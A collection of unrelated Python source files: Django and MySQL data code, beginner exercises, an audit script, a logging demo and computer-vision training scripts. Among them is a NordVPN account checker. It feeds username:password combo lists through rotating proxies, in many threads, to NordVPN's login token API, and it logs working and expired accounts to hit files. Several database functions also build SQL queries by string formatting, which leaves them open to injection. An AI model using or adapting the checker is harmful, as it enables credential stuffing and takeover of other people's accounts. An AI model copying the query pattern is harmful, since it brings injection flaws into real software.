from rest_framework.viewsets import ModelViewSet
from rest_framework.authentication import BasicAuthentication,SessionAuthentication
from rest_framework.permissions import IsAuthenticated
from .custompermission import MyPermission
class EmployeeViewSet(ModelViewSet):
queryset=Employee.objects.all()
serializer_class=EmployeeSerializer
filterset_fields=['name']
#authentication_classes=[BasicAuthentication]
#permission_classes=[IsAuthenticated]
#permission_classes=[MyPermission]
authentication_classes=[SessionAuthentication]
permission_classes=[IsAuthenticated]
|
"""
Created by hzwangjian1
on 2017-07-25
"""
import json
import os
import traceback
import pymysql
from ddzj.util import db
from alexutil import configutil
from alexutil import dateutil
from alexutil import dbutil
from alexutil import logutil
config_path = os.path.join(os.getcwd(), "config")
log_path = os.path.join(os.getcwd(), "info.log")
logger = logutil.LogUtil(log_path)
# db
online_host = configutil.get_value(config_path, "dbonline", "host")
online_port = int(configutil.get_value(config_path, "dbonline", "port"))
online_user = configutil.get_value(config_path, "dbonline", "user")
online_pass = configutil.get_value(config_path, "dbonline", "pass")
con_params = dict(host=online_host, user=online_user, password=online_pass, # 线上
database='recsys', port=online_port, charset='utf8', use_unicode=True)
conn = None
def insert_video_quality(result_list):
"""
视频静态质量结果插入到video_quality_nlp
:param result_list:
:return:
"""
# try:
with dbutil.get_connect_cursor(**con_params) as (conn, cursor):
date_str = dateutil.current_date_format()
# 7,9,3
sql='''
insert ignore into video_quality_nlp(docid, quality_score, quality_level, no_audio, category, duration, mpix_unit_time,
video_level, bit_rate, tid_level, definition, big_img, video_height, video_width, fm, resolution,
blackedge, insert_day, others, title_cheat, content_richness, content_serverity_value, qr_code)
values (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)
'''
tuple_list = []
for result in result_list:
other_info = {'player_black_edge':result['player_black_edge'], 'cnn_title_cheat':result['cnn_title_cheat'],'kw_title_cheat':result['kw_title_cheat']}
tuple_list.append((result['doc_id'], result['total_score'], result['total_score_level'], result['no_audio'], result['category'],
result['duration'], result['mpix_unit_time'], result['video_level'], result['bit_rate'], result['tid_level'],
result['definition'], result['contain_big_image'], result['video_height'], result['video_width'],
result['norm_mean_resolution'], result['resolution'], result['content_black_box_type'],
date_str,json.dumps(other_info), result['title_cheat'], result['static_video'], result['sansu_value'], result['qr_code']))
cursor.executemany(sql, tuple_list)
conn.commit()
# except Exception as e:
# logger.error(e)
# traceback.print_exc()
# logger.error(traceback.format_exc())
def get_docid_from_videoarticle(start_time, end_time):
"""
从video_article获取start_time和end_time之间插入的文章docid列表
:param start_time:
:param end_time:
:return:
"""
docid_list = []
with dbutil.connect(**con_params) as conn:
try:
with conn.cursor() as cursor:
sql_str = 'select docid from video_article where insert_time >= "{}" and insert_time < "{}"'.format(start_time, end_time)
print(sql_str)
cursor.execute(sql_str)
results = cursor.fetchall()
for docid in results:
docid_list.append(docid[0])
except Exception as e:
print(e)
traceback.print_exc()
return docid_list
def insert_video_quality_result(video_quality_list):
"""
把视频静态质量结果插入到数据库
:param video_quality_list:
:return:
"""
logger.info("insert records:{}".format(len(video_quality_list)))
insert_video_quality(video_quality_list)
def get_videos(start_time, end_time):
with db.get_cursor(**con_params) as cur:
sql = '''
select
a.mp4_url,
a.m3u8_url,
a.docid,
a.interests,
a.source_title,
a.title,
a.subtitle,
a.content,
a.category,
a.tags,
a.playersize,
a.hits,
a.location_type,
a.pic_url,
a.big_image_url,
a.doc_url,
a.publish_time,
a.insert_time,
a.expire_time,
a.urls
from
recsys.video_article a
where
a.status >= 0
and a.insert_time >= '{}' and a.insert_time < '{}' limit 22
'''.format(start_time, end_time)
cur.execute(sql)
results = cur.fetchall()
return results
def get_conn():
global conn
if conn is None:
conn = pymysql.connect(**con_params)
return conn
def get_mp4_url_by_doc_id(docid):
mp4url = None
with db.cursor(get_conn()) as cur:
sql = "select a.mp4_url from recsys.video_article a where a.docid = '%s'" % docid
cur.execute(sql)
results = cur.fetchone()
if results and len(results) >= 1:
mp4url = results[0]
return mp4url
def get_doc_by_doc_id(docid):
mp4_url, doc_id, interests, source_title, title, category = [None] * 6
with db.cursor(get_conn()) as cur:
sql = "select " \
"a.mp4_url," \
"a.docid," \
"a.interests," \
"a.source_title," \
"a.title," \
"a.category" \
" from recsys.video_article a where a.docid = '%s' limit 1" % docid
cur.execute(sql)
results = cur.fetchone()
if results and len(results) == 6:
mp4_url, doc_id, interests, source_title, title, category = results
return mp4_url, doc_id, interests, source_title, title, category
if __name__ == "__main__":
docid_list = get_docid_from_videoarticle('2017-08-08 00:00:00','2017-08-09 00:00:00')
print(len(docid_list))
print(docid_list[3]) |
# Uma empresa vende o mesmo produto para quatro diferentes estados. Cada estado possui uma taxa de imposto sobre o produto (MG 7%; SP %12; RJ 15%; MS 8%).
# Faça um programa em que o usuário entre com o valor e o estado de destino do produto e o programa retorne o preço final do produto acrescido do imposto do estado em que
# ele será vendido. Se o estado digitado não for válido, mostrar uma mensagem de erro.
print('Informe a sigla referente ao estado(Use maiúsculas)')
estado = str(input('Digite o estado '))
valorProduto = int(input('Valor de entrada: '))
if (estado.upper() == 'MG'):
print('Estado selecionado: Minas Gerais')
valorProduto += (valorProduto*0.07)
print(valorProduto)
elif (estado.upper() == 'SP'):
print('Esdado selecionado: São Paulo')
valorProduto += (valorProduto*0.12)
print(valorProduto)
elif (estado.upper() == 'RJ'):
print('Esdado selecionado: Rio de Janeiro')
valorProduto += (valorProduto*0.15)
print(valorProduto)
elif (estado.upper() == 'MS'):
print('Esdado selecionado: Mato Grosso do Sul')
valorProduto += (valorProduto*0.08)
print(valorProduto) |
#http://www.practicepython.org/exercise/2014/02/05/02-odd-or-even.html
while True:
try:
num = int(input ("Introduzca un número entero: "))
divisor = int(input ("Introduzca un divisor: "))
break
except ValueError:
print("Eso no parecen números enteros ¬¬ ")
if (num%2 == 0):
par = "par"
else:
par = "impar"
if (num%divisor==0):
divisible = "divisible"
else:
divisible = "no divisible"
if (num%4==0 and divisor!=4):
cuatro = "y es multiplo de 4!"
else:
cuatro = ""
print ("{} es un número {}, {} entre {} {}".format(num, par, divisible, divisor, cuatro))
|
#!/usr/bin/python26
import sys
import MySQLdb
CONFIG_PATH = '/scripts'
sys.path.append(CONFIG_PATH)
# explictly state what is used from TARDIS codebase, no ``import *``
from db_queries import (AUDIT_SELECT, AUDIT_UPDATE_STATUS, QUERY_ALL,
QUERY_DATA, QUERY_NO_PROXY_DATA, QUERY_PROXY)
from configs import (PROV_DB_HOST, PROV_DB_NAME, PROV_DB_USERNAME,
PROV_DB_PASSWORD, PROV_DB_PORT)
from prov_logging import (log_errors, log_exception, log_info)
from script_tracking import (failed_inserts_audit, notify_support,
track_history_exceptions)
# consider adding context to insert and update "status codes"
#AUDIT_SUCCESS = 1
def insert_audit():
"""<add a docstring when method is fully understood>"""
scriptname = "Audit"
try:
conn = MySQLdb.connect(host=PROV_DB_HOST, user=PROV_DB_USERNAME,
passwd=PROV_DB_PASSWORD, db=PROV_DB_NAME,
port=PROV_DB_PORT)
cursor = conn.cursor()
except:
err_msg = "Audit: Connection failed to Provenance database."
track_history_exceptions(err_msg)
notify_support(err_msg, scriptname)
try:
cursor.execute(AUDIT_SELECT % ('N'))
results = cursor.fetchall()
# inconsistent indent characters makes this even _harder_ to follow
# THOU SHALL NOT HAVE 180+ line methods with nesting this DEEP!
if len(results) != 0:
for row in results:
# Python has a built-in `id`, so use _id to avoid redefining.
_id = int(row[0])
uuid = int(row[1])
service_id = int(row[2])
category_id = int(row[3])
event_id = int(row[4])
username = str(row[5])
proxy_username = str(row[6])
event_data = str(row[7])
request_ipaddress = str(row[8])
created_date = int(row[9])
all_data = "{Audit row : " + str(_id) + "}"
# no proxy_username AND no event_data
if proxy_username is None and event_data is None:
insert_status = cursor.execute(QUERY_NO_PROXY_DATA %
(uuid, event_id, category_id,
service_id, username,
request_ipaddress,
created_date))
if insert_status == 1:
update_status = cursor.execute(AUDIT_UPDATE_STATUS %
('Y', _id))
if update_status == 1:
info_msg = "Audit Success: " + all_data
log_info(info_msg)
else:
err_msg = ("Audit Update: AUDIT_UPDATE_STATUS " +
"query failed" + all_data)
log_errors(err_msg)
failed_inserts_audit(all_data)
notify_support(err_msg, scriptname)
else:
err_msg = ("Audit: QUERY_NO_PROXY_DATA query failed" +
all_data)
log_errors(err_msg)
failed_inserts_audit(all_data)
notify_support(err_msg, scriptname)
# no proxy_username case (inside the 'if len > 0')
elif proxy_username != None:
insert_status = cursor.execute(QUERY_PROXY %
(uuid, event_id, category_id,
service_id, username,
proxy_username, request_ipaddress,
created_date))
if insert_status == 1:
update_status = cursor.execute(AUDIT_UPDATE_STATUS %
('Y', _id))
if update_status == 1:
info_msg = "Audit Success: " + all_data
log_info(info_msg)
else:
err_msg = ("Audit Update: AUDIT_UPDATE_STATUS " +
" query failed" + all_data)
log_errors(err_msg)
failed_inserts_audit(all_data)
notify_support(err_msg, scriptname)
else:
err_msg = "Audit: QUERY_PROXY query failed" + all_data
log_errors(err_msg)
failed_inserts_audit(all_data)
notify_support(err_msg, scriptname)
# no event_data case (inside the 'if len > 0')
elif event_data != None:
insert_status = cursor.execute(QUERY_DATA %
(uuid, event_id, category_id,
service_id, username,
event_data, request_ipaddress,
created_date))
if insert_status == 1:
update_status = cursor.execute(AUDIT_UPDATE_STATUS %
('Y', _id))
if update_status == 1:
info_msg = "Audit Success: " + all_data
log_info(info_msg)
else:
err_msg = ("Audit Update: AUDIT_UPDATE_STATUS " +
"query failed" + all_data)
log_errors(err_msg)
failed_inserts_audit(all_data)
notify_support(err_msg, scriptname)
else:
err_msg = "Audit: QUERY_DATA query failed" + all_data
log_errors(err_msg)
failed_inserts_audit(all_data)
notify_support(err_msg, scriptname)
else:
# final else block
insert_status = cursor.execute(QUERY_ALL %
(uuid, event_id, category_id,
service_id, username,
proxy_username, event_data,
request_ipaddress,
created_date))
if insert_status == 1:
update_status = cursor.execute(AUDIT_UPDATE_STATUS %
('Y', _id))
if update_status == 1:
info_msg = "Audit Success: " + all_data
log_info(info_msg)
else:
err_msg = ("Audit Update: AUDIT_UPDATE_STATUS " +
"query failed" + all_data)
log_errors(err_msg)
failed_inserts_audit(all_data)
notify_support(err_msg, scriptname)
else:
err_msg = "Audit: QUERY_ALL query failed" + all_data
log_errors(err_msg)
failed_inserts_audit(all_data)
notify_support(err_msg, scriptname)
# outside the if block ...
cursor.close()
except Exception, e:
err_msg = "AUDIT EXCEPTION: " + str(e) + ": " + all_data
log_exception(err_msg)
failed_inserts_audit(all_data)
notify_support(err_msg, scriptname)
cursor.close()
def main():
"""Script entry point.
This runs an audit check and inserts any necessary audit records.
"""
try:
insert_audit()
except Exception, e:
err_msg = "insert_audit() was not initialized " + str(e)
notify_support(err_msg, "Audit")
if __name__ == "__main__":
main()
|
import json
from helpers import _clear,_setTitle,_printText,_readFile,_getCurrentTime,_getRandomUserAgent,_getRandomProxy,colors
from threading import Thread,active_count, current_thread
from time import sleep
from datetime import datetime
import requests
class Main:
def __init__(self) -> None:
_setTitle('[NordVPN]')
_clear()
title = colors['bcyan']+"""
╔═════════════════════════════════════════════════════════════════════════╗
$$\ $$\ $$\ $$\ $$\ $$$$$$$\ $$\ $$\
$$$\ $$ | $$ |$$ | $$ |$$ __$$\ $$$\ $$ |
$$$$\ $$ | $$$$$$\ $$$$$$\ $$$$$$$ |$$ | $$ |$$ | $$ |$$$$\ $$ |
$$ $$\$$ |$$ __$$\ $$ __$$\ $$ __$$ |\$$\ $$ |$$$$$$$ |$$ $$\$$ |
$$ \$$$$ |$$ / $$ |$$ | \__|$$ / $$ | \$$\$$ / $$ ____/ $$ \$$$$ |
$$ |\$$$ |$$ | $$ |$$ | $$ | $$ | \$$$ / $$ | $$ |\$$$ |
$$ | \$$ |\$$$$$$ |$$ | \$$$$$$$ | \$ / $$ | $$ | \$$ |
\__| \__| \______/ \__| \_______| \_/ \__| \__| \__|
╚═════════════════════════════════════════════════════════════════════════╝
"""
print(title)
self.stop_thread = False
self.hit = 0
self.bad = 0
self.expired = 0
self.retries = 0
self.use_proxy = int(input(f'{colors["bcyan"]}[>] {colors["yellow"]}[1]Proxy/[2]Proxyless:{colors["bcyan"]} '))
self.proxy_type = None
if self.use_proxy == 1:
self.proxy_type = int(input(f'{colors["bcyan"]}[>] {colors["yellow"]}[1]Https/[2]Socks4/[3]Socks5:{colors["bcyan"]} '))
self.threads = int(input(f'{colors["bcyan"]}[>] {colors["yellow"]}Threads:{colors["bcyan"]} '))
self.session = requests.session()
print('')
def _titleUpdate(self):
while True:
_setTitle(f'[NordVPN] ^| HITS: {self.hit} ^| BAD: {self.bad} ^| EXPIRED: {self.expired} ^| RETRIES: {self.retries}')
sleep(0.4)
if self.stop_thread == True:
break
def _check(self,user,password):
useragent = _getRandomUserAgent('useragents.txt')
headers = {'User-Agent':useragent,'Content-Type':'application/json','Host':'api.nordvpn.com','Accept':'application/json','DNT':'1','Origin':'chrome-extension://fjoaledfpmneenckfbpdfhkmimnjocfa'}
proxy = _getRandomProxy(self.use_proxy,self.proxy_type,'proxies.txt')
payload = {'username':user,'password':password}
try:
response = self.session.post('https://api.nordvpn.com/v1/users/tokens',json=payload,proxies=proxy,headers=headers)
if "'code': 100103" in response.text:
self.bad += 1
_printText(colors['bcyan'],colors['red'],'BAD',f'{user}:{password}')
with open('[Results]/bads.txt','a',encoding='utf8') as f:
f.write(f'{user}:{password}\n')
elif "'code': 101301" in response.text:
self.bad += 1
_printText(colors['bcyan'],colors['red'],'BAD',f'{user}:{password}')
with open('[Results]/bads.txt','a',encoding='utf8') as f:
f.write(f'{user}:{password}\n')
elif 'user_id' in response.text:
expires_at = response.json()['expires_at']
expires_at = datetime.strptime(expires_at,"%Y-%m-%d %H:%M:%S")
curr_time = datetime.strptime(_getCurrentTime(),"%Y-%m-%d %H:%M:%S")
if expires_at < curr_time:
self.expired += 1
_printText(colors['bcyan'],colors['red'],'EXPIRED',f'{user}:{password} [{expires_at}]')
with open('[Results]/expireds.txt','a',encoding='utf8') as f:
f.write(f'{user}:{password} [{str(expires_at)}\n')
else:
self.hit += 1
_printText(colors['bcyan'],colors['green'],'HIT',f'{user}:{password} [{expires_at}]')
with open('[Results]/hits.txt','a',encoding='utf8') as f:
f.write(f'{user}:{password}\n')
with open('[Results]/detailed_hits.txt','a',encoding='utf8') as f:
f.write(f'{user}:{password} [{str(expires_at)}]\n')
elif '429 Too Many Requests' in response.text:
self.retries += 1
self._check(user,password)
else:
self.retries += 1
self._check(user,password)
except Exception:
self.retries += 1
self._check(user,password)
def _start(self):
combos = _readFile('combos.txt','r')
t = Thread(target=self._titleUpdate)
t.start()
threads = []
for combo in combos:
run = True
user = combo.split(':')[0]
password = combo.split(':')[1]
while run:
if active_count()<=self.threads:
thread = Thread(target=self._check,args=(user,password))
threads.append(thread)
thread.start()
run = False
for x in threads:
x.join()
print('')
_printText(colors['bcyan'],colors['yellow'],'FINISHED','Process done!')
if __name__ == '__main__':
Main()._start() |
import logging
from log import log
import submodule
# this is a standard method for creating a logging object
LOG = logging.getLogger(__name__)
if __name__ == '__main__':
# we set up the logging configuration
# additionally, the logging.yaml has a console handler, so all logs will be emitted to
# stdout as well as the filehanlders specified
log.setup_logging('../log/config/logging.yaml', log_dir='./logs')
# a logging message from the main thread (take note of the first item, should be main.py)
LOG.info('This is a test log for the main thread')
# a logging message from the imported thread (the first item should be submodule.py)
submodule.write_info_log('This is an imported INFO log message.')
# we can also disable imported logs by name
submodule_logger = logging.getLogger('submodule')
# before setting the submodule_logger level, we can that because our global logger
# is set at INFO, the following won't emit
submodule.write_debug_log("This won't write anywhere.")
# but if we set the level of that logger to debug, it will now emit
submodule_logger.setLevel(logging.DEBUG)
submodule.write_debug_log('Now this will write out')
# we can silence all but the most critical warnings like this
submodule_logger.setLevel(logging.CRITICAL)
submodule.write_critical_log('Oh no! Major malfunction.')
# We can print all logger objects available through all imported modules
# I've import requests so we can see more loggers
import requests
print(log.get_all_loggers())
# you might notice a my_module logger in there as well -- this is from the log
# module we import -- if we don't specify a logger name, this defaults to my_module
|
import os
import sys
def setup():
global fileHandle, fileData
filename = input("Enter an input file name: ")
exists = os.path.isfile("./%s" % filename)
notEmpty = os.path.getsize("./%s" % filename) > 0
if exists and notEmpty:
fileHandle = open ("./%s" % filename, "r")
else:
print ("File doesn't exist or is empty.")
exit
fileData = list()
for entry in fileHandle:
fileData.append(entry)
fileHandle.close()
def stringsDifferByOne(string1, string2):
global diffPosn
singleDiffFound = False
for i in range(len(string1)):
if string1[i] != string2[i]:
if singleDiffFound:
singleDiffFound = False
break
else:
singleDiffFound = True
diffPosn = i
return singleDiffFound
setup()
for i in range(len(fileData)):
for j in range (i, len(fileData)):
if stringsDifferByOne(fileData[i], fileData[j]):
checksum = fileData[i][:diffPosn] + fileData[i][diffPosn+1:]
print("Checksum:", checksum)
exit |
import cv2
import numpy as np
import matplotlib.pyplot as plt
from glob import glob
from keras.utils import np_utils
from sklearn.datasets import load_files
# 加载数据集函数
def load_dataset(path):
data = load_files(path)
dog_files = np.array(data['filenames'])
dog_targets = np_utils.to_categorical(np.array(data['target']), 133)
return dog_files, dog_targets
# 加载训练集,验证集,和测试集
train_files, train_targets = load_dataset('./dogImages/train')
valid_files, valid_targets = load_dataset('./dogImages/valid')
test_files, test_targets = load_dataset('./dogImages/test')
# 加载所有狗品种名称
dog_names = [item[25:-1] for item in glob('./dogImages/train/*/')]
# 输出数据集统计数据
print('There are %d total dog categories.' % len(dog_names))
# There are 133 total dog categories.
print('There are %s total dog images.\n' % str(len(train_files) + len(valid_files) + len(test_files)))
# There are 8351 total dog images.
print('There are %d training dog images.' % len(train_files))
# There are 6680 training dog images.
print('There are %d validation dog images.' % len(valid_files))
# There are 835 validation dog images.
print('There are %d test dog images.' % len(test_files))
# There are 836 test dog images.
# 可视化部分图片
def visualize_img(img_path, ax):
img = cv2.imread(img_path)
ax.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
fig = plt.figure(figsize=(20, 10))
for i in range(12):
ax = fig.add_subplot(3, 4, i + 1, xticks=[], yticks=[])
visualize_img(train_files[i], ax)
plt.show()
|
# Generated by Django 1.10.5 on 2017-02-15 12:28
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('admin', '0009_auto_20170215_0948'),
]
operations = [
migrations.AddField(
model_name='domain',
name='quota',
field=models.PositiveIntegerField(default=0, help_text='Quota in MB shared between mailboxes. A value of 0 means no quota.'),
),
migrations.AlterField(
model_name='domain',
name='default_mailbox_quota',
field=models.PositiveIntegerField(default=0, help_text='Default quota in MB applied to mailboxes. A value of 0 means no quota.', verbose_name='Default mailbox quota'),
),
migrations.AlterField(
model_name='mailbox',
name='quota',
field=models.PositiveIntegerField(default=0),
),
]
|
import os
import sys
import glob
import cv2
import numpy as np
import argparse
from timeit import default_timer as timer
'''
Usage :
./db_indexing.py -d "database_name"
Example :
./db_indexing.py -d "base1"
'''
######## Program parameters
parser = argparse.ArgumentParser()
## Database name
parser.add_argument("-d", "--database", dest="db_name",
help="input image database", metavar="STRING", default="None")
args = parser.parse_args()
## Set paths
img_dir="./../Images/" + args.db_name + "/"
imagesNameList = glob.glob(img_dir+"*.jpg")
output_dir="./results/" + args.db_name
if not os.path.exists(img_dir):
print "The directory containing images: "+img_dir+" is not found -- EXIT\n"
sys.exit(1)
start = timer()
databaseDescriptors = []
databaseIndex = []
nbimages = 0
nbdescriptors = 0
for imageName in imagesNameList:
img = cv2.imread(imageName)
sift = cv2.xfeatures2d.SIFT_create()
_, des = sift.detectAndCompute(img,None)
nbimages = nbimages + 1
if (des is not None):
for descriptor in des:
databaseDescriptors.append(descriptor)
databaseIndex.append([nbimages,imageName])
nbdescriptors = nbdescriptors + 1
print databaseIndex[1]
FLANN_INDEX_ALGO=0
index_params = dict(algorithm = FLANN_INDEX_ALGO) # for linear search
### OpenCV 2.4.13
print index_params
fl=cv2.flann_Index(np.asarray(databaseDescriptors,np.float32),index_params)
end = timer()
print "Indexing time: " + str(end - start)
np.save(output_dir + "_DB_Descriptors.npy", databaseDescriptors)
np.save(output_dir + "_DB_Index.npy", databaseIndex)
print "Nb Images : " + str(nbimages) + ", Nb Descriptors : "+ str(nbdescriptors)
fl.save(output_dir + "_flan_index-LINEAR.dat")
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
"""
This script is a simplified version of the training script in detectron2/tools.
"""
import os
import random
import numpy as np
import torch
import time
import math
import logging
from collections import defaultdict
import pickle
from fvcore.common.file_io import PathManager
from collections import OrderedDict
from itertools import count
from typing import Any, Dict, List, Set
from detectron2.checkpoint import DetectionCheckpointer
from detectron2.config import get_cfg
from detectron2.data import build_detection_train_loader
from detectron2.engine import DefaultTrainer, default_argument_parser, default_setup, launch
from detectron2.evaluation import COCOEvaluator
from detectron2.solver.build import maybe_add_gradient_clipping
from tsp_rcnn import add_troi_config, DetrDatasetMapper
from tsp_fcos import add_fcos_config
from detectron2.utils.events import EventStorage
from detectron2.utils.logger import setup_logger
import detectron2.utils.comm as comm
from torch.nn.parallel import DistributedDataParallel
from detectron2.modeling.meta_arch import GeneralizedRCNN
from detectron2.modeling import GeneralizedRCNNWithTTA, DatasetMapperTTA
from tsp_rcnn.my_fast_rcnn_output import fast_rcnn_inference_single_image
# Register PASCAL datasets
from tsp_rcnn.fsdet_data.builtin import register_all_pascal_voc
#register_all_pascal_voc()
class HybridOptimizer(torch.optim.Optimizer):
def __init__(self, params, lr=1e-3, momentum=0, dampening=0, betas=(0.9, 0.999), eps=1e-8, weight_decay=1e-4):
defaults = dict(lr=lr, momentum=momentum, dampening=dampening,
betas=betas, eps=eps, weight_decay=weight_decay)
super(HybridOptimizer, self).__init__(params, defaults)
def __setstate__(self, state):
super(HybridOptimizer, self).__setstate__(state)
for group in self.param_groups:
group.setdefault("optimizer", "SGD")
@torch.no_grad()
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
with torch.enable_grad():
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
if group["optimizer"] == "SGD":
weight_decay = group['weight_decay']
momentum = group['momentum']
dampening = group['dampening']
d_p = p.grad
if weight_decay != 0:
d_p = d_p.add(p, alpha=weight_decay)
if momentum != 0:
param_state = self.state[p]
if 'momentum_buffer' not in param_state:
buf = param_state['momentum_buffer'] = torch.clone(d_p).detach()
else:
buf = param_state['momentum_buffer']
buf.mul_(momentum).add_(d_p, alpha=1 - dampening)
d_p = buf
p.add_(d_p, alpha=-group['lr'])
elif group["optimizer"] == "ADAMW":
# Perform stepweight decay
p.mul_(1 - group['lr'] * group['weight_decay'])
# Perform optimization step
grad = p.grad
if grad.is_sparse:
raise RuntimeError('Adam does not support sparse gradients, please consider SparseAdam instead')
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['exp_avg'] = torch.zeros_like(p, memory_format=torch.preserve_format)
# Exponential moving average of squared gradient values
state['exp_avg_sq'] = torch.zeros_like(p, memory_format=torch.preserve_format)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
beta1, beta2 = group['betas']
state['step'] += 1
bias_correction1 = 1 - beta1 ** state['step']
bias_correction2 = 1 - beta2 ** state['step']
# Decay the first and second moment running average coefficient
exp_avg.mul_(beta1).add_(grad, alpha=1 - beta1)
exp_avg_sq.mul_(beta2).addcmul_(grad, grad, value=1 - beta2)
denom = (exp_avg_sq.sqrt() / math.sqrt(bias_correction2)).add_(group['eps'])
step_size = group['lr'] / bias_correction1
p.addcdiv_(exp_avg, denom, value=-step_size)
else:
raise NotImplementedError
return loss
class AdetCheckpointer(DetectionCheckpointer):
"""
Same as :class:`DetectronCheckpointer`, but is able to convert models
in AdelaiDet, such as LPF backbone.
"""
def _load_file(self, filename):
if filename.endswith(".pkl"):
with PathManager.open(filename, "rb") as f:
data = pickle.load(f, encoding="latin1")
if "model" in data and "__author__" in data:
# file is in Detectron2 model zoo format
self.logger.info("Reading a file from '{}'".format(data["__author__"]))
return data
else:
# assume file is from Caffe2 / Detectron1 model zoo
if "blobs" in data:
# Detection models have "blobs", but ImageNet models don't
data = data["blobs"]
data = {k: v for k, v in data.items() if not k.endswith("_momentum")}
if "weight_order" in data:
del data["weight_order"]
return {"model": data, "__author__": "Caffe2", "matching_heuristics": True}
loaded = super()._load_file(filename) # load native pth checkpoint
if "model" not in loaded:
loaded = {"model": loaded}
basename = os.path.basename(filename).lower()
if "lpf" in basename or "dla" in basename:
loaded["matching_heuristics"] = True
return loaded
def append_gt_as_proposal(gt_instances):
for instances in gt_instances:
instances.proposal_boxes = instances.gt_boxes
instances.gt_idxs = torch.arange(len(instances.gt_boxes))
return gt_instances
class Trainer(DefaultTrainer):
def __init__(self, cfg):
"""
Args:
cfg (CfgNode):
"""
self.clip_norm_val = 0.0
if cfg.SOLVER.CLIP_GRADIENTS.ENABLED:
if cfg.SOLVER.CLIP_GRADIENTS.CLIP_TYPE == "full_model":
self.clip_norm_val = cfg.SOLVER.CLIP_GRADIENTS.CLIP_VALUE
DefaultTrainer.__init__(self, cfg)
def run_step(self):
assert self.model.training, "[Trainer] model was changed to eval mode!"
start = time.perf_counter()
data = next(self._trainer._data_loader_iter)
data_time = time.perf_counter() - start
loss_dict = self.model(data)
losses = sum(loss_dict.values())
#self._detect_anomaly(losses, loss_dict) # removed with new detectron2
metrics_dict = loss_dict
#metrics_dict["data_time"] = data_time
self._trainer._write_metrics(metrics_dict, data_time)
self.optimizer.zero_grad()
losses.backward()
if self.clip_norm_val > 0.0:
clipped_params = []
for name, module in self.model.named_modules():
for key, value in module.named_parameters(recurse=False):
if "transformer" in name:
clipped_params.append(value)
torch.nn.utils.clip_grad_norm_(clipped_params, self.clip_norm_val)
self.optimizer.step()
@classmethod
def build_evaluator(cls, cfg, dataset_name, output_folder=None):
if output_folder is None:
output_folder = os.path.join(cfg.OUTPUT_DIR, "inference")
return COCOEvaluator(dataset_name, cfg, True, output_folder)
@classmethod
def build_optimizer(cls, cfg, model):
"""
Build an optimizer from config.
"""
norm_module_types = (
torch.nn.BatchNorm1d,
torch.nn.BatchNorm2d,
torch.nn.BatchNorm3d,
torch.nn.SyncBatchNorm,
# NaiveSyncBatchNorm inherits from BatchNorm2d
torch.nn.GroupNorm,
torch.nn.InstanceNorm1d,
torch.nn.InstanceNorm2d,
torch.nn.InstanceNorm3d,
torch.nn.LayerNorm,
torch.nn.LocalResponseNorm,
)
params: List[Dict[str, Any]] = []
memo: Set[torch.nn.parameter.Parameter] = set()
for name, _ in model.named_modules():
print(name)
for name, module in model.named_modules():
for key, value in module.named_parameters(recurse=False):
if not value.requires_grad:
continue
# Avoid duplicating parameters
if value in memo:
continue
memo.add(value)
lr = cfg.SOLVER.BASE_LR
weight_decay = cfg.SOLVER.WEIGHT_DECAY
optimizer_name = "SGD"
if isinstance(module, norm_module_types):
weight_decay = cfg.SOLVER.WEIGHT_DECAY_NORM
elif key == "bias":
# NOTE: unlike Detectron v1, we now default BIAS_LR_FACTOR to 1.0
# and WEIGHT_DECAY_BIAS to WEIGHT_DECAY so that bias optimizer
# hyperparameters are by default exactly the same as for regular
# weights.
lr = cfg.SOLVER.BASE_LR * cfg.SOLVER.BIAS_LR_FACTOR
weight_decay = cfg.SOLVER.WEIGHT_DECAY_BIAS
if "bottom_up" in name:
lr = lr * cfg.SOLVER.BOTTOM_UP_MULTIPLIER
elif "transformer" in name:
lr = lr * cfg.SOLVER.TRANSFORMER_MULTIPLIER
optimizer_name = "ADAMW"
params += [{"params": [value], "lr": lr, "weight_decay": weight_decay, "optimizer": optimizer_name}]
optimizer_type = cfg.SOLVER.OPTIMIZER
if optimizer_type == "SGD":
optimizer = torch.optim.SGD(params, cfg.SOLVER.BASE_LR, momentum=cfg.SOLVER.MOMENTUM)
elif optimizer_type == "ADAMW":
optimizer = torch.optim.AdamW(params, cfg.SOLVER.BASE_LR)
elif optimizer_type == "HYBRID":
optimizer = HybridOptimizer(params, cfg.SOLVER.BASE_LR, momentum=cfg.SOLVER.MOMENTUM)
else:
raise NotImplementedError(f"no optimizer type {optimizer_type}")
if not cfg.SOLVER.CLIP_GRADIENTS.CLIP_TYPE == "full_model":
optimizer = maybe_add_gradient_clipping(cfg, optimizer)
return optimizer
@classmethod
def build_train_loader(cls, cfg):
if cfg.INPUT.CROP.ENABLED:
mapper = DetrDatasetMapper(cfg, True)
else:
mapper = None
return build_detection_train_loader(cfg, mapper=mapper)
@classmethod
def test_with_TTA(cls, cfg, model):
logger = logging.getLogger("detectron2.trainer")
# In the end of training, run an evaluation with TTA
# Only support some R-CNN models.
logger.info("Running inference with test-time augmentation ...")
model = MyGeneralizedRCNNWithTTA(cfg, model)
evaluators = [
cls.build_evaluator(
cfg, name, output_folder=os.path.join(cfg.OUTPUT_DIR, "inference_TTA")
)
for name in cfg.DATASETS.TEST
]
res = cls.test(cfg, model, evaluators)
res = OrderedDict({k + "_TTA": v for k, v in res.items()})
return res
def initialize_from_support(trainer_self):
class_means = defaultdict(list)
class_activations = defaultdict(list)
print('Computing support set centroids')
# Make sure this doesn't break on multigpu
# Disable default Collate function
support_loader = torch.utils.data.DataLoader(trainer_self.data_loader.dataset.dataset, batch_size=trainer_self.data_loader.batch_size, shuffle=False, num_workers=4, collate_fn=lambda x:x)
with EventStorage() as storage:
for i, batched_inputs in enumerate(support_loader):
#for i, batched_inputs in enumerate(trainer_self.data_loader):
print('Processed {} batches'.format(i))
self = trainer_self.model
images = self.preprocess_image(batched_inputs)
gt_instances = [x["instances"].to(self.device) for x in batched_inputs]
features = self.backbone(images.tensor)
